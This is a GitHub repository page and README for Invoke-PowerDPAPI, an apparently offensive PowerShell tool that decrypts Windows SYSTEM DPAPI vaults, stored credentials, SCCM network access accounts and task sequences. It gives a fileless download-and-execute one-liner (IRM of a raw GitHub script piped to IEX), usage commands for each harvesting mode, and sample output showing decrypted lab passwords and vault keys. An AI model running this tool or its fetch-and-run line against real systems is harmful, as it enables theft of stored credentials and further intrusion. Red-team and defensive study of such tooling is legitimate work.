Name	Name	Last commit message	Last commit date
Latest commit History 5 Commits
Invoke-PowerDPAPI.ps1	Invoke-PowerDPAPI.ps1
LICENSE	LICENSE
README.md	README.md

Invoke-PowerDPAPI

Invoke-PowerDPAPI is a PowerShell port of some SharpDPAPI and SharpSCCM functionality.

For the moment this is limited to SYSTEM level functions such as triaging SYSTEM master keys and decrpypting the following secrets:

System Vaults
System Credentials
SCCM NAA accounts (WMI / Disk)
SCCM Task Sequences (WMI / Disk)

Future Updates

Not all SharpDPAPI functionality will be implemented into this port. This will be limited to functionality that fits my workflow and code that I believe can be reused in further projects.

Future updates to be completed:

User level DPAPI
Automate takeover of each user logon session and decrypt each user DPAPI secret
SYSTEM Certificates
Domain Backup key support

Requirements

Invoke-PowerDPAPI must be executed in a high integrity process

Load into memory

IRM "https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerDPAPI/refs/heads/main/Invoke-PowerDPAPI.ps1" | IEX

Usage

Triage Everything

Runs MachineVaults, MachineCredentials, SCCM_Disk and SCCM_WMI

Invoke-PowerDPAPI MachineTriage

Triage MachineVaults

Invoke-PowerDPAPI MachineVaults

[*] Triaging SYSTEM Vaults [*] Triaging Vault Folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 Name : Web Credentials guidMasterKey : {e922342f-143e-4b65-a25b-e83354a47007} size : 324 flags : 0x20000000 (CRYPTPROTECT_SYSTEM) algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : guidMasterKey : size : 324 flags : 0x20000000 (CRYPTPROTECT_SYSTEM) algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : Vault Policy Key aes128 key : 17D5264E849A7136427830A4835B8669 aes256 key : 428397F3F8260174A5923BC66CC014CB2D3C4ABAFB5FFBC90D7A959DC4DC817C

Triage MachineCredentials

Invoke-PowerDPAPI MachineCredentials

[*] Triaging System Credentials Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials CredFile : 3F38B7EDDCC210906994CAC4A9077348 guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 544 flags : 0x20000000 (CRYPTPROTECT_SYSTEM) algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : Local Credential Data guidMasterKey : size : 264 flags : 0x00000030 (CRYPTPROTECT_SYSTEM) algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : Local Credential Data LastWritten : 6/19/2025 12:18:59 AM TargetName : Domain:batch=TaskScheduler:Task:{52340B14-C919-4223-970B-103 AAAFE2720} TargetAlias : Comment : UserName : ludus\domainuser Credential : password

Triage SCCM (WMI and Disk)

Runs SCCM_WMI and SCCM_Disk

Invoke-PowerDPAPI SCCM

Triage SCCM (WMI)

Invoke-PowerDPAPI SCCM_WMI Invoke-PowerDPAPI SCCM_WMI -SaveTS # Saves Task Sequences in XML format to PWD

[+] Found 1 Network Access Account(s) [+] Decrypting network access account credentials guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 266 flags : 0x00000000 algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 250 flags : 0x00000000 algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : Network Access Username: ludus\sccm_naa_2 Network Access Password: password123 [+] Found 2 Task Sequence(s) [+] Decrypting Task Sequences guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 8042 flags : 0x00000000 algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : [+] Task Sequence: smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable" sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable" false false 0 3010

Triage SCCM (Disk)

Invoke-PowerDPAPI SCCM_Disk Invoke-PowerDPAPI SCCM_Disk -SaveTS # Saves Task Sequences in XML format to PWD

[+] Decrypting 1 network access account secrets guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 266 flags : 0x00000000 algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 250 flags : 0x00000000 algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : NetworkAccessUsername: ludus\sccm_naa_2 NetworkAccessPassword: password123 [+] Decrypting 1 task sequence secrets guidMasterKey : {8173b631-3636-4c96-81e7-ae2c8fd60632} size : 2154 flags : 0x00000000 algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable" sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable" false false 0 3010

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

The-Viper-One/Invoke-PowerDPAPI

Folders and files

Latest commit

History

Repository files navigation

Invoke-PowerDPAPI

Future Updates

Requirements

Load into memory

Usage

Triage Everything

Triage MachineVaults

Triage MachineCredentials

Triage SCCM (WMI and Disk)

Triage SCCM (WMI)

Triage SCCM (Disk)

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Contributors

Uh oh!

Languages